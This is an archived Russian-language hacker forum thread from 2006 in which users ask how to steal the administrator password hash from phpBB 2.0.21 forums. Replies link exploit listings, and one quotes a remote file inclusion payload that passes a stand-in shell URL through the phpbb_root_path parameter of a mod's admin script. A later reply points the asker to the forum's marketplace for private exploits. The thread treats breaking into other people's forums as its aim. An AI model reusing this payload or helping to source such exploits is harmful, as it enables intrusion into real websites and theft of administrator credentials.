Просмотр полной версии : Кто реально вытаскивал хеш админа форума на phpBB2.0.21?
Сейчас phpBB один из самых стабильных состем форумов.
Есть ли такие перцы кто всё же ломал последню версию?
Если не секрет то как? каким экспойтом, или чем-то другим?
Поделись - интересно.
Пробывали многие, но у кого получалось?
multiple PHP application poison NULL byte vulnerability phpBB 2.0.21
http://milw0rm.com/exploits/2348
Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
http://milw0rm.com/exploits/2429
з.ы. сам пока не пробовал эту версию...
последний сплойт
Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://SHELLURL.COM
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
syntacsis
27.10.2006, 05:00
В упор не вижу файла admin_topic_action_logging.php?... (во 2ой ветке..)
Неудивительно =)
Это файл от мода "Admin Topic Action Logging Mod" для phpbb. Сплоит если и будет работать, то только на форуме с этим модом
Есть ли такие перцы кто всё же ломал последню версию?
Если не секрет то как? каким экспойтом, или чем-то другим?
Поделись - интересно.
Насколько мне известно, такие перцы есть. И тут на ачате тоже. И совсем не секрет, чем они ломали - мозгами и руками. =)
syntacsis, дай плх их ники. Просто задать пару вопросов, ну или пусть сами отвят каким эксплойтом или снифером. Мне нужно знать чем, а уж как я разберусь.
Как ни как поиск рулит!
_-[A.M.D]HiM@S-_
27.10.2006, 19:07
ну или пусть сами отвят каким эксплойтом или снифером
тут тебе этого не ответят ) ибо приват сплойты :)
Обратись в Роздел "покупка продажа" и напиши сплойт "для такой-то версии"
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot